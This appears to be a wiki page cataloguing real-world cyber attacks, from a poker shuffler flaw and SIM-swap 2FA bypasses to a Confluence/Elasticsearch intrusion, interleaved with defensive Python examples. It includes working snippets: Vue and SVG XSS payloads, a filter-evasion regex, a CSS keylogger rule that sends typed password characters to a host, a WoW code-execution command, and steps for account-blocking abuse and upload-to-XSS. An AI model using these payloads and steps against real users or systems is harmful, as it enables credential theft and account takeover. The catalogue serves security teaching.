Cyber Attacks

From Teach The Net

Standard Hacks

Information Leakage

Mobile App Rackspace credentials embedded within app

Thursday, the hacker said he started wiping some cloud servers that belong to Retina-X Studios, a Florida-based company that sells spyware products targeted at parents and employers, but that are also used by people to spy on their partners without their consent.

Retina-X was one of two companies that were breached last year in a series of hacks that exposed the fact that many otherwise ordinary people surreptitiously install spyware on their partners’ and children’s phones in order to spy on them. This software has been called “stalkerware” by some. 

...The private data was stored in containers provided by cloud provider Rackspace. The hacker found the key and credentials to those containers inside the Android app of PhoneSheriff, one of Retina-X’s spyware products. The API key and the credentials were stored in plaintext, meaning the hacker could take them and gain access to the server.

This time, the hacker said the API key was obfuscated, but it was still relatively easy for him to obtain it and break in again. Because he feared another hacker getting in and then posting the private photos online, the hacker decided to wipe the containers again.

- Article

Client-side Validation

BitGrail javascript validation for withdrawal

BitGrail (a cryptocurrency exchange) was hacked for $170 million, allegedly because "the checks for whether you had a sufficient balance to withdraw were only implemented as client-side JavaScript".
- Tweet

RNG

Texas Hold 'Em online - bad shuffler

Texas Hold 'Em, card shuffling randomness. We found that the algorithm used by ASF Software, Inc., the company that produces the software used by most of the online poker games, suffered from many flaws.
 
In a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. When a computer shuffles a virtual deck of cards, it selects one of these possible combinations. There are many algorithms that can be used to shuffle a deck of cards, some of which are better than others (and some of which are just plain wrong).

The shuffling algorithm used in the ASF software always starts with an ordered deck of cards, and then generates a sequence of random numbers used to re-order the deck. Recall that in a real deck of cards, there are 52! (approximately 2^226) possible unique shuffles. Also recall that the seed for a 32-bit random number generator must be a 32-bit number, meaning that there are just over 4 billion possible seeds. Since the deck is reinitialized and the generator re-seeded before each shuffle, only 4 billion possible shuffles can result from this algorithm. Four billion possible shuffles is alarmingly less than 52!.

To make matters worse, the algorithm of Figure 1 chooses the seed for the random number generator using the Pascal function Randomize(). This particular Randomize() function chooses a seed based on the number of milliseconds since midnight. There are a mere 86,400,000 milliseconds in a day. Since this number was being used as the seed for the random number generator, the number of possible decks now reduces to 86,400,000. Eighty-six million is alarmingly less than four billion. But that's not all. It gets worse.

The system clock seed gave us an idea that reduced the number of possible shuffles even further. By synchronizing our program with the system clock on the server generating the pseudo-random number, we are able to reduce the number of possible combinations down to a number on the order of 200,000 possibilities. After that move, the system is ours, since searching through this tiny set of shuffles is trivial and can be done on a PC in real time.

The RST exploit itself requires five cards from the deck to be known. Based on the five known cards, our program searches through the few hundred thousand possible shuffles and deduces which one is a perfect match. In the case of Texas Hold'em poker, this means our program takes as input the two cards that the cheating player is dealt, plus the first three community cards that are dealt face up (the flop). These five cards are known after the first of four rounds of betting and are enough for us to determine (in real time, during play) the exact shuffle. 

- Article
- Another article on it
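The passage above argues from counting: a shuffle can never produce more distinct decks than its seed source has values. The following is an added example (not code from the article or from ASF Software) that makes the argument concrete: a Fisher-Yates shuffle driven by a 32-bit LCG seeded from "milliseconds since midnight" stands in for the flawed design (the LCG constants are a common Borland-style choice, an assumption, not the vendor's code), and a CSPRNG-driven shuffle shows the fix.

```python
import math
import secrets

# Constructed 52-card deck: rank then suit, e.g. "AS" is the ace of spades.
DECK = [rank + suit for suit in "SHDC" for rank in "23456789TJQKA"]


def log2_factorial(n):
    """log2(n!) as a sum of logs, so no huge integers are needed."""
    return sum(math.log2(i) for i in range(1, n + 1))


class Lcg32:
    """A plain 32-bit linear congruential generator.

    Assumption: this stands in for the Pascal runtime generator the article
    describes. The multiplier is the classic Borland one; it is only a model.
    """

    def __init__(self, seed):
        self.state = seed & 0xFFFFFFFF

    def below(self, n):
        self.state = (self.state * 134775813 + 1) & 0xFFFFFFFF
        return (self.state * n) >> 32  # scale the 32-bit state into [0, n)


def fisher_yates(deck, rand_below):
    """Unbiased Fisher-Yates shuffle driven by any rand_below(n) callable."""
    deck = list(deck)
    for i in range(len(deck) - 1, 0, -1):
        j = rand_below(i + 1)
        deck[i], deck[j] = deck[j], deck[i]
    return deck


def weak_shuffle(ms_since_midnight):
    """The flawed design: re-seed from the clock, then shuffle a fresh ordered
    deck. Every deck this can ever produce is indexed by one of 86,400,000 seeds."""
    return fisher_yates(DECK, Lcg32(ms_since_midnight).below)


def secure_shuffle():
    """Seed-free alternative: every index is drawn from the OS CSPRNG."""
    return fisher_yates(DECK, secrets.randbelow)


def distinct_decks(start_ms, window_ms):
    """How many different decks the weak shuffle can yield inside a clock window.
    An observer who knows the server clock to within window_ms faces only this
    many candidates, which is the point the article makes."""
    decks = {tuple(weak_shuffle(ms)) for ms in range(start_ms, start_ms + window_ms)}
    return len(decks)


def entropy_report():
    """Bits needed for a uniform shuffle versus bits the seed sources supply."""
    return {
        "bits_needed": log2_factorial(52),            # about 225.6
        "bits_32bit_seed": math.log2(2 ** 32),         # 32
        "bits_ms_of_day": math.log2(86_400_000),       # about 26.4
    }


if __name__ == "__main__":
    print(entropy_report())
    print("decks reachable in a 1 s clock window:", distinct_decks(0, 1000))
```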

Bridge hand generator RNG

ACBL and USBF hand generators are demonstrably insecure
- Related Issue/Article

CSRF

Challenges

* Hackme
* Be sure to do both GET (image) and POST (form) examples. 
* To defeat origin header, use image/get hosted on domain (e.g. profile image)
* To defeat CSRF token, have a javascript file that sets the url to a variable name exposing the CSRF token if you include that javascript file. link (also have another where the CSRF token just has to be unused before, or unique, or doesn't validate at all)

Clickjacking

Informative Blog

CSS has a property called position that allows an element to sit on top of another element. In addition, the property pointer-events allows click events to pass through an element, so that the click is actually registered on the element underneath. When the two are combined, I can stack a fake button on top of the actual button and trick you into clicking it...

If you have logged in to Facebook, then what you just did was to like my blog post (which I appreciate) without realizing it. This time, opacity is used instead of pointer-events. opacity is a CSS property that controls the opacity of an element. 

People have been exploiting Clickjacking with web widgets. Many social media sites were actually vulnerable to this. For example, you could use Clickjacking to gain followers with the Twitter follow button, and a more recent issue on the LinkedIn AutoFill button leaks visitors' information to third-party websites. Sites have started fixing it by requiring additional user interactions, for example, opening a new window for users to confirm an action. In fact, Likejacking probably no longer works nowadays. If you try to click the above Facebook like button, it may turn into a "Confirm" button which requires you to click again after you click it. Essentially, they now use an algorithm to determine if an embedding site is trustworthy and hence the number of additional user interactions. Ultimately this is a trade-off between usability and security.

However, X-Frame-Options: SAMEORIGIN has a serious flaw... At the time of writing, only Chrome and Firefox have fixed the issue by making the check against all frame ancestors, which is compliant to CSP's frame-ancestors 'self'.

Actually don't even click anything. Malicious websites can simply track your cursor's position and change the invisible button/iframe's position accordingly. So even if you make a click by mistake you will be forced to click on something else.

There's no reliable way to prevent Clickjacking...

- Article

SQL Truncation

Challenges

* CTF Sql Truncation Challenge

File Upload

Challenges

* HackMe File Upload

Microsoft Word Document upload to stored XSS

Microsoft Word Document upload to stored XSS
* File upload on site, only takes in .docx files...
* Extension validation is client-side. Can upload file with any extension.
* File download is triggered via a url, without `Content-Disposition: attachment`, expectation is download is just triggered based off docx extension. So if we can upload a file the browser can render, it will load instead of being downloaded.
* On a test docx file, file downloaded does not exactly match file uploaded - implies some processing is done on the file when uploaded.
* Hack: Take a valid .docx file, upload and then download. Find areas of strings that were not changed by server-side processing, insert html in those areas. Change file extension to .html, and then upload. 'Download' link should now host html page running your javascript.
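The hack above works because the extension check lives in the browser and the download relies on the extension to decide rendering. As an added example (not code from the site in the write-up), the check below validates a .docx upload server-side by its ZIP structure, refuses anything that starts like markup a browser would render, and returns the download headers that force an attachment regardless of content; the file names and the minimal in-memory .docx are constructed for the test.

```python
import io
import zipfile

# ZIP members every real .docx (an OOXML package) carries.
REQUIRED_MEMBERS = {"[Content_Types].xml", "word/document.xml"}

# Byte prefixes of content a browser would happily render inline.
RENDERABLE_PREFIXES = (b"<!doctype", b"<html", b"<?xml", b"<svg", b"<script")


def looks_like_docx(data: bytes) -> bool:
    """Server-side check keyed on content, not on the client-supplied extension."""
    if not data.startswith(b"PK\x03\x04"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if not REQUIRED_MEMBERS <= set(zf.namelist()):
                return False
            # Verify member CRCs as well, so a corrupted archive is refused.
            if zf.testzip() is not None:
                return False
    except zipfile.BadZipFile:
        return False
    return True


def is_renderable_markup(data: bytes) -> bool:
    """True if the first bytes look like HTML/SVG/XML rather than a document."""
    head = data.lstrip()[:64].lower()
    return head.startswith(RENDERABLE_PREFIXES)


def accept_upload(filename: str, data: bytes):
    """Return (accepted, reason). Extension is checked again here because the
    client-side check in the write-up can be bypassed trivially."""
    if not filename.lower().endswith(".docx"):
        return False, "extension"
    if is_renderable_markup(data):
        return False, "markup"
    if not looks_like_docx(data):
        return False, "not-a-docx"
    return True, "ok"


def download_headers(stored_name: str) -> dict:
    """Headers that make the browser download the file instead of rendering
    it, even if the stored bytes turn out to be an HTML page."""
    safe = "".join(c for c in stored_name if c.isalnum() or c in "._-") or "file"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def build_sample_docx() -> bytes:
    """Constructed minimal OOXML package for testing; not a real Word file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()
```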

SQL Injection

Challenges

* SQL Injection Auth Code
* SQL Injection Login
* multiple

SDK hidden behind access code, but with a deadline

  • The idynamo SDK download was gated behind an access code sent by US mail with 1-2 week delivery. But there was a deadline to create the product... and the developer already had the device without the SDK.

Affiliate backend pagination leads to downfall

  • Paul Le Roux hunted by the US Government. They caught him because of a simple SQL Injection flaw in the pagination of an affiliate backend on RX Limited.

A lot of shady services online allow affiliates or resellers to take a cut and expand their reach.

In an invite-only affiliate control panel of this site, there was a SQL injection flaw in the pagination. Using this SQL injection, the attacker dumped the database and saw all affiliate payouts, including the biggest-earning affiliates (who tended to be the big names / biggest scammers), along with how they were paid.

Original comment on Hackernews thread featuring this article:

Guys I can tell you how he got caught. At around 2011 I hacked RXLimited backend through a security flaw on christmas eve.

They had one simple SQL Injection flaw in pagination in their affiliate backend. Through this I was able to extract the VPN config of the webserver including the keys, which I then used to log in to their VPN with my computer.

After snooping around a bit, I found that their backup server had Apache directory listing enabled, and I was able to download several hundred megabytes of database backups. I got kicked out of the VPN several times but I was able to continue the download to completion.

From these database backups I extracted the payment information of all affiliates, compiled a list sorted by sum(payouts) desc including SWIFT payment infos and a detailed list of payments to affiliates with date and amount.

This list was submitted through my local law enforcement in the EU to their counterparts in the US. I never heard back from them, but using this info you could easily find out where the money was moved around with all shady figures attached.

You can believe me or not, but it was a nice hobby to fuck the bad guys over. The money moving around in this business still astonishes me. And all through a simple SQLi in pagination in the most remote view of their affiliate backend...
- Link to original Hackernews comment, since censored Archived snapshot of comment

Metasploit/CVE Database

Wordpress Challenges

* Sample Repo
* toolkit

Security Company Challenge

Background

Computer security company sells security products. In an effort to get publicity, puts up a secure server, offers a macbook for anyone who hacks into it.

Review products company sells

  • Note that their documentation is on a Confluence wiki. If they use Confluence wiki so heavily for user-facing docs, likely they use them internally too.

Google confluence wiki

  • Find that it's a self-hosted solution, complex and thus hard to update.
  • Scan for their version in CVE database. Find a hit! CVE-2015-8399 allows unauthenticated users to browse and read files from disk that are accessible to the Confluence user, and docs.inversoft.com was vulnerable to it
  • Review files capable of reading through above exploit, find nothing of significance (no configuration file).

Nmap scan on domain where confluence wiki was hosted

  • Find postgres database, mysql database, elasticsearch, ssh, several http services. Get versions of each.
  • Find elasticsearch is old, and thus vulnerable to CVE-2015-1427 which allows remote code execution.

Now have SSH access as non-root user

  • Could read anything elasticsearch could see, Confluence was also running under this same user!
  • Scanning around, found database credentials confluence used to talk to postgres.
  • Used credentials above to get a dump of the Confluence database for off-line perusing.

Scanning the database

  • It was indeed used for internal documentation
  • Contained various passwords and keys, including a linode username/password (the target was on linode). Turns out it's a valid, but wrong, linode account.

Thinking through next steps

  • use our access to intercept a password reset email for the real linode account?
  • use our access to make a convincing phish email
  • Rescanning our existing gathered info... find in the elasticsearch account's root directory a variety of shared dev files, including api keys to the real linode instance! Connect in, dump db.

Overall

  • utility servers used by devs are the key

Article

MySQL: sql injection escalate to code execution CVE-2016-6662

- Article

XSS

Challenges

Vue.js Server-side XSS
* XSS attack is filtered out, but can inject a Vue.js template expression, e.g. `{{constructor.constructor("alert('xss')")()}}`
* This exploit is possible because the app is mixing server-side rendering and client-side rendering.

Cookie stealing challenge
* And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):

Cheatsheet
* html injection via encoding: https://hackerone.com/reports/104543
* markdown processing injection (instead of bbcode): https://hackerone.com/reports/112935

XSS with SVG?

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('You have been hacked!');
</script>
</svg>
- Post 1

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS');
</script>
</svg>
- Post 2

Spoofing

Challenges

- Hackme Social Engineering

Spoof 2-factor auth text message

The reader’s daughter had received a text message claiming to be from Google, warning that her Gmail account had been locked because someone in India had tried to access her account. The young woman was advised to expect a 6-digit verification code to be sent to her and to reply to the scammer’s message with that code.

Cobb’s daughter received the scam text message because she’d enabled 2-factor authentication on her Gmail account, selecting the option to have Google request that she enter a 6-digit code texted to her cell phone each time it detects a login from an unknown computer or location (in practice, the code is to be entered on the Gmail site, not sent in any kind of texted or emailed reply).

In this case, the thieves already had her password — most likely because she re-used it on some other site that got hacked. Cobb says he and his daughter believe her mobile number and password may have been exposed as part of the 2012 breach at LinkedIn.

In any case, the crooks were priming her to expect a code and to repeat it back to them because that code was the only thing standing in the way of their seizing control over her account. And they could control when Google would send the code to her phone because Google would do this as soon as they tried to log in using her username and password. Indeed, the timing aspect of this attack helps make it more believable to the target.

- Article
T-Mobile's website had a security flaw in a URL endpoint which returned a user's email address, account details and the phone's IMSI network code. The user's phone number was passed in the URL, but it could be edited to any other T-Mobile number to obtain that subscriber's information. This information is all a hacker needs to call T-Mobile and transfer control of the phone number to a different SIM under their control. With control of the phone number, they can then receive 2-factor auth text messages. 

In fact, this is exactly what happened to Techcrunch writer John Biggs on August 22nd. After impersonating him and obtaining a replacement for his T-Mobile SIM, a hacker was able to quickly change his Gmail, Facebook, and other passwords, even though they were protected by two-factor SMS authentication.

- Article
- Video demonstrating the exploit
- Techcrunch writer's side of the story
In these cases, the fraudsters can call a customer service specialist at a mobile provider and pose as the target, providing the mark’s static identifiers like name, date of birth, social security number and other information. Often this is enough to have a target’s calls temporarily forwarded to another number, or ported to a different provider’s network.
- Krebs Article

More stories of porting/stealing cell phone numbers to defeat 2 factor auth:

Typo-squatting a domain for SSH password

Question: When you accidentally attempt to connect to the wrong server with password credentials is it possible for the administrator to read and log the password you used?

Answer: Yes

- Stackoverflow Question

GMAIL sent folder spoof

Spoofing FROM address to get into GMAIL Sent folder
* A normal spoofed 'from' email, sent FROM a gmail user TO another gmail user, will actually appear in the SENT folder of the real FROM user's account.

Unicode characters in URL spoof

Spoofing URL with look-alike unicode characters on Firefox / TOR Browser
* Firefox (and Tor Browser) display unicode characters in the URL indistinguishably from ASCII characters. Chrome and other browsers convert them to punycode.
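The look-alike URL trick depends on the browser showing the raw Unicode label. As an added example (not code from any browser), the check below renders a hostname in punycode the way Chrome's address bar does and flags labels that mix scripts, a heuristic Chrome applies and that the note says Firefox did not; it also flags any non-ASCII label, which is stricter than either browser. The script classification comes from Unicode character names and is coarse by design; the hostname in the test is constructed.

```python
import unicodedata


def script_of(ch):
    """Coarse script name taken from the Unicode character name, e.g.
    "CYRILLIC SMALL LETTER A" -> "CYRILLIC". Non-letters carry no script."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    return name.split(" ")[0] if name else "UNKNOWN"


def scripts_in_label(label):
    return {s for s in map(script_of, label) if s}


def to_punycode(hostname):
    """The ASCII-compatible form a browser can show instead of the raw label."""
    return hostname.encode("idna").decode("ascii")


def assess_hostname(hostname):
    """Per-label findings plus an overall verdict.

    mixed_script mirrors the rule that makes Chrome fall back to punycode.
    A whole label written in one non-Latin script (e.g. all Cyrillic) would
    pass that rule, so non-ASCII labels are reported as suspicious as well;
    a full confusables table would be needed to rank those precisely."""
    findings = []
    for label in hostname.split("."):
        scripts = scripts_in_label(label)
        findings.append({
            "label": label,
            "ascii": label.isascii(),
            "scripts": sorted(scripts),
            "mixed_script": len(scripts) > 1,
        })
    return {
        "punycode": to_punycode(hostname),
        "labels": findings,
        "suspicious": any(f["mixed_script"] or not f["ascii"] for f in findings),
    }


if __name__ == "__main__":
    # Constructed example: Cyrillic small a (U+0430) followed by Latin "pple".
    print(assess_hostname("\u0430pple.com"))
```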

CEO whaling/spear phishing

Whaling is a well-oiled social engineering scam that sees criminals dupe financial controllers at large lucrative organisations. Whalers' main method is to send emails that appear to originate from chief executive officers, bearing instructions to wire cash into nominated bank accounts.

It works. The FBI estimates some $2.2bn (£1.7bn, A$2.9bn) in losses have arisen from nearly 14,000 whaling cases in the seven months to May this year. Some $800m (£601m, A$1bn) in losses occurred in the 10 months to August 2015.
Harpooned companies include Mattel, which shipped and by dumb luck recouped $3m its executive sent to a hacker's Chinese bank account; Ubiquiti, which lost $46.7m in June last year; and Belgian bank Crelan, which lost $78m in January.

They join Accenture, Chanel, Hugo Boss, HSBC, and countless smaller victims.

- Article
Brisbane council loses $500k to scammers

- Article
Barbie-brained Mattel exec phell for phishing, sent $3m to China

- Article
Ubiquiti stung US$46.7 million in e-mail spoofing fraud

- Article
Vigilante hacks back at CEO wire transfer scammers, sending a poisoned PDF pretending to be a transaction confirmation. When opened, "We were able to get the Windows 10 usernames and hashes which are tied by default to Outlook."

- Article

DOS

Block Skype Accounts trivially

Block anyone's Skype account
* Have about 20 different accounts search for target user X and click Report User
* Done, victim is now blocked from Skype and locked out.

Shutdown iPad Kiosks with sunlight

This reminds me of a “bug” I found when working for a company that sells package lockers to apartment buildings. We used iPads for the user interface and had monitoring in place to alert us if an iPad went offline.
At only one location with two iPads one would go offline almost every day (but not every day) between 12pm and 1pm, for 10-20 minutes. Never the same time of day, and never the same length of time. It was always the same iPad, the other one on that network stayed online the entire time.
We replaced the iPad and the problem persisted. Finally I got fed up, put my phone on silent, ignored everything, and watched the Dropcam feed for the 2 hours near the usual time. Slowly I saw the sun light up the lockers, eventually shining on the iPad. Ten minutes later, after sitting in direct sunlight, it went offline. As the sun moved, the iPad went back into shadow and came online on its own.
It was overheating and shutting itself off until it cooled down. The time changed because day lengths change, and the days it didn’t go offline were cloudy.
- Hackernews thread

DNS Rebinding

Tools

* Open source tool: Jaqen
* Hosted tool used via subdomains: rbndr
* Defcon Talk: Achieving reliable DNS rebinding 2017

Electrum, a bitcoin client

* Has a JSON-RPC API enabled by default, with CORS enabled. This made it trivial for any website to connect to your wallet's API and dump the seeds. In this GitHub issue, the developers decided to disable CORS. This still leaves it vulnerable to DNS rebinding attacks.
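Disabling CORS does not help against rebinding because, after the attacker's DNS answer flips to 127.0.0.1, the request is same-origin and carries the attacker's hostname in the Host header. The added example below (not Electrum's code) shows the check that does close the hole: a local RPC listener that refuses any request whose Host header is not one of its own names. The port and handler are constructed; a real daemon would take the allow-list from its bind configuration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumption: the daemon listens on loopback port 7777 (constructed value).
RPC_PORT = 7777
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}


def split_host_port(host_header):
    """Return (host, port) from a Host header value; handles bracketed IPv6.
    Returns (None, None) for a malformed header."""
    h = host_header.strip().lower()
    if h.startswith("["):
        end = h.find("]")
        if end == -1:
            return None, None
        host, rest = h[:end + 1], h[end + 1:]
        port = rest[1:] if rest.startswith(":") else ""
    else:
        host, _, port = h.partition(":")
    return host, port


def host_is_allowed(host_header, allowed=ALLOWED_HOSTS, port=RPC_PORT):
    """DNS rebinding delivers a browser request to loopback with the attacker's
    hostname in Host:. Comparing Host: against the names this service actually
    answers to rejects such requests no matter what DNS said."""
    if not host_header:
        return False
    host, p = split_host_port(host_header)
    if host is None or host not in allowed:
        return False
    if p and p != str(port):
        return False
    return True


class RpcHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        if not host_is_allowed(self.headers.get("Host")):
            self.send_error(403, "Host header not allowed")
            return
        length = int(self.headers.get("Content-Length", 0))
        _body = self.rfile.read(length)  # constructed handler: drain and reply
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(b'{"result": "ok"}')


def serve():
    HTTPServer(("127.0.0.1", RPC_PORT), RpcHandler).serve_forever()
```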

Novel Hacks

Fingerprinting Documents to track leakers / inside threats

Unicode homoglyph substitution [Conference Paper on Unicode Homoglyph Substitution] [Web App for Unicode Homoglyph Substitution]

Zero-width characters [Blog Post]

Article on all methods [Good general article]

Intentional misspelling (used in congress) [Blog Post]

Stealth Cell Tower

Stealth Cell Tower is an antagonistic GSM base station in the form of an innocuous office printer. It brings the covert design practice of disguising cellular infrastructure as other things - like trees and lamp-posts - indoors, while mimicking technology used by police and intelligence agencies to surveil mobile phone users.

Masquerading as a regular cellular service provider, Stealth Cell Tower surreptitiously catches phones and sends them SMSs written to appear they are from someone that knows the recipient. It does this without needing to know any phone numbers.

With each response to these messages, a transcript is printed revealing the captured message sent, alongside the victim’s unique IMSI number and other identifying information. Every now and again the printer also randomly calls phones in the environment and on answering, Stevie Wonder’s 1984 classic hit I Just Called To Say I Love You is heard.

- Article

Self-Propagating Smart Light Bulb Worm

Abstract: Within the next few years, billions of IoT devices will densely populate our cities. In this paper we describe a new type of threat in which adjacent IoT devices will infect each other with a worm that will spread explosively over large areas in a kind of nuclear chain reaction, provided that the density of compatible IoT devices exceeds a certain critical mass. In particular, we developed and verified such an infection using the popular Philips Hue smart lamps as a platform. The worm spreads by jumping directly from one lamp to its neighbors, using only their built-in ZigBee wireless connectivity and their physical proximity. The attack can start by plugging in a single infected bulb anywhere in the city, and then catastrophically spread everywhere within minutes, enabling the attacker to turn all the city lights on or off, permanently brick them, or exploit them in a massive DDOS attack. To demonstrate the risks involved, we use results from percolation theory to estimate the critical mass of installed devices for a typical city such as Paris whose area is about 105 square kilometers: The chain reaction will fizzle if there are fewer than about 15,000 randomly located smart lights in the whole city, but will spread everywhere when the number exceeds this critical mass (which had almost certainly been surpassed already).

To make such an attack possible, we had to find a way to remotely yank already installed lamps from their current networks, and to perform over-the-air firmware updates. We overcame the first problem by discovering and exploiting a major bug in the implementation of the Touchlink part of the ZigBee Light Link protocol, which is supposed to stop such attempts with a proximity test. To solve the second problem, we developed a new version of a side channel attack to extract the global AES-CCM key that Philips uses to encrypt and authenticate new firmware. We used only readily available equipment costing a few hundred dollars, and managed to find this key without seeing any actual updates. This demonstrates once again how difficult it is to get security right even for a large company that uses standard cryptographic techniques to protect a major product.

- Schneier article, Article

Inaudible Sound Attacks

- Cuban Sonic Weapon Attack - Reverse Engineered

- Alexa/Siri attacks: Dolphin Attack Article / Dolphin Attack Paper

- Embedding the above attack into music

Tracking Pixel Service to decrypt emails

  • Client sends you an encrypted email, asks you to append tracking pixel. You do so and then forward it along.
  • Your tracking pixel actually sends you the decrypted version of the email from the client's machine.
  • Some mail clients concatenate all parts of a multipart message together, even joining partial HTML elements, allowing the decrypted plaintext of an OpenPGP or S/MIME encrypted part to be exfiltrated via an image tag.

Hackernews thread Article

Project a voice with a laser

This specific project, called Non-Lethal Laser Induced Plasma Effects (NL LIPE), aims to have perfected a beam that can produce audible instructions and commands to an individual or a small group of people within three years and maybe have a practical prototype system ready in five years.
- Article

Casino Hacked Through Fish Tank Thermometer

A casino was hacked through its Internet-connected thermometer in an aquarium in its lobby. Hackers exploited a vulnerability in the thermostat to get a foothold in the network. Once there, they managed to access the high-roller database of gamblers and then pulled it back across the network, out the thermostat, and up to the cloud.
- Article
A North American casino recently installed a high-tech fish tank as a new attraction, with advanced sensors that automatically regulate temperature, salinity, and feeding schedules. To ensure these communications remained separate from the commercial network, the casino configured the tank to use an individual VPN to isolate the tank’s data. However, as soon as Darktrace was installed, it identified anomalous data transfers from the fish tank to a rare external destination. 
- Report

World of Warcraft: RemoveExtraSpaces

World of Warcraft supports add-ons to their interface in the Lua script language. Because of this, they have a robust api for these add-ons to use.

For this attack, the attacker must convince the player to enter one single command into their chat window:

/run RemoveExtraSpaces=RunScript

In this command, '/run' says to interpret what follows as a Lua script, 'RemoveExtraSpaces' is a built-in function that removes extra spaces from text, and 'RunScript' is a built-in function that executes text as Lua script (similar to eval in javascript).

The function 'RemoveExtraSpaces' is executed on every chat message a player receives, so in effect the above command causes every chat message the player receives to be executed as though it's Lua script.

Now the attacker can simply whisper the victim player to cause the user's interface to do anything he wishes, or to extract information about the player. He can (for example), extract the current player's location in game from his UI, approach the player in game, and then open a trade with the player and force the player's UI to hit the accept button.

[Article]

CSS Keylogger

Concept (repeat for every ascii character):

input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
  • Works for password inputs that update 'value' attribute with the typed in value, a common pattern in React.
  • For password managers like LastPass, you can get the first character with [value^=a], the last character with [value$=a], and a character anywhere in the string with [value*=a]. Targeting, for example, the first two and last two characters plus any in the middle takes around 13000 combinations.

Open Source Lib
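Because the keylogger is pure CSS, it can be spotted by its shape: an attribute selector on an input's value combined with a declaration that fetches a url(). The added example below (not the open-source library linked above) scans a stylesheet for that shape; the sample stylesheet is constructed and the rule tokenizer is deliberately simple (flat rules, no nested @media). The real fix is on the application side: never mirror a password field's value into its attribute, and restrict img-src with CSP.

```python
import re

# One flat CSS rule: "selector { declarations }".
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")
# [value^=x], [value$=x] or [value*=x] with any quoting style.
ATTR_VALUE_RE = re.compile(
    r"""\[\s*value\s*([\^$*]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*\]""", re.I)
# First url() in a declaration block.
URL_RE = re.compile(r"""url\(\s*['"]?([^'")]+)""", re.I)


def find_attribute_exfil_rules(css):
    """Return rules that key a remote fetch on an <input>'s value attribute.

    Each hit records the matching operator, the probed substring and the URL,
    which is exactly the per-character mapping the keylogger relies on."""
    hits = []
    for selector, body in RULE_RE.findall(css):
        selector = selector.strip()
        if "input" not in selector.lower():
            continue
        attr = ATTR_VALUE_RE.search(selector)
        url = URL_RE.search(body)
        if attr and url:
            hits.append({
                "selector": selector,
                "operator": attr.group(1),
                "probe": attr.group(2).strip("'\""),
                "url": url.group(1).strip(),
            })
    return hits


def count_probed_chars(hits):
    """Distinct substrings a stylesheet probes for; a full keylogger probes
    every printable character, so a high count is the strongest signal."""
    return len({h["probe"] for h in hits})


# Constructed stylesheet: three exfiltration rules among harmless ones.
SAMPLE_CSS = """
body { background: #fff; }
input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
input[type="password"][value$="e"] { background-image: url('http://localhost:3000/e'); }
input[type="password"][value^="a"] { background: url(http://localhost:3000/first/a); }
input[type="text"] { border: 1px solid #ccc; }
"""

if __name__ == "__main__":
    for hit in find_attribute_exfil_rules(SAMPLE_CSS):
        print(hit["operator"], hit["probe"], "->", hit["url"])
```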

Jumping Airgaps

Guri and his fellow Ben-Gurion researchers have shown, for instance, that it's possible to trick a fully offline computer into leaking data to another nearby device via the noise its internal fan generates, by changing air temperatures in patterns that the receiving computer can detect with thermal sensors, or even by blinking out a stream of information from a computer hard drive LED to the camera on a quadcopter drone hovering outside a nearby window. In new research published today, the Ben-Gurion team has even shown that they can pull data off a computer protected by not only an air gap, but also a Faraday cage designed to block all radio signals.
- Quoted from Schneier's blog, which quotes from here

Page with all research results

Overall concept:

  • Drop a USB drive with malware in a parking lot. Employee picks it up, and sticks it in an air gapped machine to see what's on it. This infects that machine.
  • Now we have a machine not connected to the internet that is infected... use one of the proposed concepts above to exfiltrate the data.

Payoff

Cryptocurrency private keys for hot wallets

Coincheck $500 million hack

According to the exchange’s representatives, the hackers have managed to steal the private key for the hot wallet where NEM coins were stored, enabling them to drain the funds. 
- Article

Gatecoin $2 million hack

Most clients’ asset funds are stored in multi-signature, cold wallets. However, the attacker managed to alter the system so that BTC and ETH deposit transfers bypassed the multi-signature cold storage and entered the hot wallet during the breach. The loss of ETH funds exceeded the 5% limit Gatecoin placed on its hot wallets.
- Article

Hacking to game the stock market

St Jude's

St Jude's Medical Inc.'s pacemakers and defibrillators had a vulnerability that was discovered by researchers working for a legit company. They email an investment firm with an offer to make money.

The researchers would provide information proving the medical devices could be hacked in a way that was life-threatening, and the investor would take a short position against St Jude. The hacker's fee for the information would be 10% of the profits as the shares fall. If the shares go up, the hackers will pay 20% of the lost money.

The researchers want to impose significant monetary penalties on companies they believe are negligent about protecting consumers (rather than collecting a typical bug bounty). They don't believe other hackers will exploit the flaws, since it took their team months to find them and they will withhold key details from the public. 
- Article

Medical device maker St Jude has filed suit against a security startup that shorted its stock and publicized alleged flaws in its products for profit.

